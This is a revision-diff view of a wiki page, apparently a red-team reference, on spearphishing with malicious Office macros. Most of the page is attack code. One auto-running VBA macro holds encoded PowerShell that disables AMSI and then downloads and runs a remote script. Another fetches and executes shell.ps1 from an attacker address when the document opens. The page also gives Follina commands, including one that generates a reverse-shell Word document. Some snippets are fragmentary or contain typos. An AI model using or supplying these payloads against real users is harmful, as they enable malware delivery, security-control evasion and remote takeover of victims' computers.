(2 intermediate revisions by the same user not shown) | |||
Line 1: | Line 1: | ||
== Description == | == Description == | ||
Attackers may use spearphishing tactics to trick individuals into revealing sensitive information by sending an email with a malicious attachment. This type of spearphishing, known as "spearphishing for information," is an attempt to trick targets into divulging information, frequently credentials or other actionable information. This type of spearphishing is targeted at a specific individual, company or industry, and the attackers attach a file to the email and rely on the recipient to populate information and return the file. The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. They may also use information gathered from previous reconnaissance efforts such as searching open websites or the victim's website to create convincing and believable lures. | Attackers may use spearphishing tactics to trick individuals into revealing sensitive information by sending an email with a malicious attachment. This type of spearphishing, known as "spearphishing for information," is an attempt to trick targets into divulging information, frequently credentials or other actionable information. This type of spearphishing is targeted at a specific individual, company or industry, and the attackers attach a file to the email and rely on the recipient to populate information and return the file. The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. They may also use information gathered from previous reconnaissance efforts such as searching open websites or the victim's website to create convincing and believable lures. | ||
[https://attack.mitre.org/techniques/T1566/001/ MITRE ATT&CK] | |||
== Office Documents == | == Office Documents == | ||
Line 7: | Line 9: | ||
Sub AutoOpen() | Sub AutoOpen() | ||
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=") | CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=") | ||
End Sub | |||
</syntaxhighlight> | |||
<syntaxhighlight lang="vb"> | |||
Sub AutoOpen() | |||
MyMacro | |||
End Sub | |||
Sub Document_Open() | |||
MyMacro | |||
End Sub | |||
Sub MyMacro() | |||
Dim Str As String | |||
Str = "powershell.exe -ep bypass -windowstyle hidden -noexit -c IEX(New-Object Net.WebClient).downloadString('http://10.10.14.240:443/shell.ps1')" | |||
CreateObject("Wscript.Shell").Run Str | |||
End Sub | End Sub | ||
</syntaxhighlight> | </syntaxhighlight> | ||
Line 32: | Line 47: | ||
[https://github.com/christophetd/spoofing-office-macro Spoofing Office Macro] | [https://github.com/christophetd/spoofing-office-macro Spoofing Office Macro] | ||
[https://github.com/cedowens/Mythic-Macro-Generator Mythic Macro Generator] | [https://github.com/cedowens/Mythic-Macro-Generator Mythic Macro Generator] | ||
[https://github.com/cldrn/macphish Mac Phish] | [https://github.com/cldrn/macphish Mac Phish] | ||
Latest revision as of 10:00, 21 January 2023
Description
Attackers may use spearphishing tactics to trick individuals into revealing sensitive information by sending an email with a malicious attachment. This type of spearphishing, known as "spearphishing for information," is an attempt to trick targets into divulging information, frequently credentials or other actionable information. This type of spearphishing is targeted at a specific individual, company or industry, and the attackers attach a file to the email and rely on the recipient to populate information and return the file. The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. They may also use information gathered from previous reconnaissance efforts such as searching open websites or the victim's website to create convincing and believable lures.
Office Documents
Macro Examples
Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
End Sub
Sub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub MyMacro()
Dim Str As String
Str = "powershell.exe -ep bypass -windowstyle hidden -noexit -c IEX(New-Object Net.WebClient).downloadString('http://10.10.14.240:443/shell.ps1')"
CreateObject("Wscript.Shell").Run Str
End Sub
Sub AutoOpen()
Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"
End Sub
Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1
Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>
Also see:
Follina
# Calc.exe
python3 follina.py
# notepad
python3 follina.py -c "notepad"
# Reverse Shell + Generated word.doc
python3 follina.py -r 9001